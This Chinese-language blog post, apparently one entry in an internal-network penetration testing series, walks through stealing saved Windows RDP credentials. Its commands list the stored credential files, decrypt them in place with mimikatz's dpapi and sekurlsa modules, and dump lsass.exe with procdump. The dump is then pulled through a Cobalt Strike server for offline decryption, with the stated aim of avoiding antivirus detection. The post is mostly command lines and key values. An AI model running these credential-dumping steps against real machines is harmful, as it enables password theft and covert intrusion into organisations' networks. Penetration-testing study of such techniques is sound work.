系列文章第一章節之基礎知識篇
内網滲透(一)之基礎知識-内網滲透介紹和概述
内網滲透(二)之基礎知識-工作組介紹
内網滲透(三)之基礎知識-域環境的介紹和優點
内網滲透(四)之基礎知識-搭建域環境
内網滲透(五)之基礎知識-Active Directory活動目錄介紹和使用
内網滲透(六)之基礎知識-域中的權限劃分和基本思想
内網滲透(七)之基礎知識-企業常見安全域劃分和結構
内網滲透(八)之基礎知識-企業域中計算機分類和專業名
系列文章第二章節之内網資訊收集篇
内網滲透(九)之内網資訊收集-手動本地資訊收集
内網滲透(十)之内網資訊收集-編寫自動化腳本收集本地資訊
内網滲透(十一)之内網資訊收集-内網IP掃描和發現
内網滲透(十二)之内網資訊收集-内網端口掃描和發現
内網滲透(十三)之内網資訊收集-收集域環境中的基本資訊
内網滲透(十四)之内網資訊收集-域環境中查找域内使用者基本資訊
内網滲透(十五)之内網資訊收集-域環境中定位域管理者
内網滲透(十六)之内網資訊收集-powershell基礎知識
内網滲透(十七)之内網資訊收集-powershell收集域内資訊和敏感資料定位
系列文章第三章節之Windows協定認證和密碼抓取篇
内網滲透(十八)之Windows協定認證和密碼抓取-本地認證(NTML哈希和LM哈希)
内網滲透(十九)之Windows協定認證和密碼抓取-網絡認證(基于挑戰響應認證的NTLM協定)
内網滲透(二十)之Windows協定認證和密碼抓取-域認證(Kerberos協定)
内網滲透(二十一)之Windows協定認證和密碼抓取-Golden Ticket黃金票據制作原理及利用方式
内網滲透(二十二)之Windows協定認證和密碼抓取-Silver Ticket白銀票據制作原理及利用方式
内網滲透(二十三)之Windows協定認證和密碼抓取-Mimikatz介紹和各種子產品使用方法
内網滲透(二十四)之Windows協定認證和密碼抓取-Mimikatz讀取sam和lsass擷取密碼
内網滲透(二十五)之Windows協定認證和密碼抓取-使用Hashcat和線上工具破解NTLM Hash
内網滲透(二十六)之Windows協定認證和密碼抓取-浏覽器、資料庫等其他密碼的抓取
内網滲透(二十七)之Windows協定認證和密碼抓取-Windows其他類型抓取NTLM HASH工具
注:閱讀本編文章前,請先閱讀系列文章,以免造成看不懂的情況!
Windows RDP憑證的抓取和密碼破解
環境準備
| 機器 | IP |
|---|---|
| Windows 2012(域控) | 192.168.41.10 |
| Windows 2008(域内主機) | 192.168.41.20 |
破解原理
Credentials的解密是Windows系統資訊收集中非常重要的一環,其中包括各類敏感、重要的憑證(這個可以了解為密碼),接下來我們就講解RDP憑證的抓取和破解
在我們點選儲存密碼後,Windows就通過MasterKey将我們的密碼加密後儲存在本地,由于Windows還需要解密進而使用,是以這個過程是可逆,也正因為這一緣由,我們隻要拿到MasterKey就能将密碼解出來。
win+R 輸入mstsc 打開遠端桌面
輸入我們要連接配接的計算機IP
輸入賬戶密碼,儲存憑證
成功進行了遠端登入
憑證的檢視
檢視憑證指令
檢視mstsc的連接配接記錄
cmdkey /list
查找本地的Credentials
dir /a %userprofile%\appdata\local\microsoft\credentials\*
線上破解
1、使用mimikatz擷取該檔案的MasterKey的guid
mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\FF22A1FDA68FD8515B52C534E8655421
是以用于加密憑據檔案FF22A1FDA68FD8515B52C534E8655421的MasterKey的guid就是:{acd3587e-d1b8-4c1b-87cf-50e85d72f405},是以我們隻要從記憶體中找到這個guid對應的MasterKey的值即可
2、找到記憶體中對應的MasterKey
mimikatz sekurlsa::dpapi
3、最後打開mimikatz通過MasterKey值去解密憑據檔案
dpapi::cred /in:憑據檔案路徑 /masterky:masterkey值
mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\FF22A1FDA68FD8515B52C534E8655421 /masterkey:17c106dca97992a6522638c4f6d5fcccd577c9cfaf1485450b2e70a2fd6ab41ec57b798eac30804ee801db18d205d86776c3be80d50fa18ad27a977fbd7670bc
離線破解
由于我們不能保證我們的mimikatz是免殺狀态,為了避免被對方發現,我們可以離線解密進而達到擷取密碼的目的其實很簡單,就是把目标的檔案和記憶體下載下傳回來,在vps或本機上進mimikatz解密即可。
1、上傳procdump.exe到目标機器上
2、下載下傳目标記憶體
procdump.exe ‐accepteula ‐ma lsass.exe lsass1.dump //導出lsass
3、下載下傳目标的lsass1.dmp檔案同時下載下傳目标的Credentials檔案到本地機器上
這裡下載下傳檔案,預設的路勁是下載下傳到cs伺服器目錄中的download檔案夾内,将你cs中download檔案夾内剛剛下載下傳好的檔案拷貝到你的本地機器上
然後将這兩個檔案放到mimikatz同一路勁下
4、用mimikatz載入dump回來的記憶體
Sekurlsa::minidump lsass1.dump
5、擷取Credentials的GUID
dpapi::cred /in:FF22A1FDA68FD8515B52C534E8655421
6、擷取記憶體中所有的MasterKey
sekurlsa::dpapi
7、利用MasterKey解密
dpapi::cred /in:FF22A1FDA68FD8515B52C534E8655421 /masterkey:b3354c56cd35630d10aa7477c3d16e9b94587f1dc6f9d0c8fcb72a5e4a25c8aab8fa242194666c4cc4be9485c31af555b01a49abbfbb8cc1c00d209da624f33c